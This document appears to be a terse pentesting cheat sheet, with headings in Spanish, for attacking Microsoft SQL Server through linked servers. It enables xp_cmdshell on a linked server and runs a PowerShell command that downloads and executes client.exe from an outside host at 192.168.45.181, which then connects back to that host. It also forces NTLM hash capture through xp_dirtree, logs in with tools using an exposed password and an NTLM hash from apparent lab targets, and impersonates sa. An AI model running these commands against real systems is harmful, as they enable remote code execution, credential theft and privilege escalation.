Enumeración

EXEC sp_linkedservers;
SELECT * FROM sys.servers;

Linked Server → RCE

EXEC ('sp_configure ''show advanced options'',1;RECONFIGURE;') AT [SQL53];
EXEC ('sp_configure ''xp_cmdshell'',1;RECONFIGURE;') AT [SQL53];

EXEC [SQL53].master..xp_cmdshell '
powershell -c "iwr <http://192.168.45.181/client.exe> -o C:\\Users\\Public\\client.exe;
C:\\Users\\Public\\client.exe --url ws://192.168.45.181:8000/ws"
';

Captura NTLM

EXEC master.sys.xp_dirtree '\\\\192.168.45.181\\l';

Acceso interactivo

impacket-mssqlclient webapp11:[email protected] -db music

mssqlpwner -hashes ':73a34bad3e589783936fcd0a407dcf39' cowmotors-int.com/'web01$'@172.16.111.223 -windows-auth interactive

mssqlpwner 'signed.htb/mssqlsvc:purPLE9795!@'@10.10.11.90 -windows-auth interactive

Linked Server con credenciales

EXEC sp_addlinkedsrvlogin
 @rmtsrvname='SQL03',
 @useself='false',
 @locallogin=NULL,
 @rmtuser='sa',
 @rmtpassword='TuContraseña';

Impersonar SA

EXECUTE AS LOGIN = 'sa';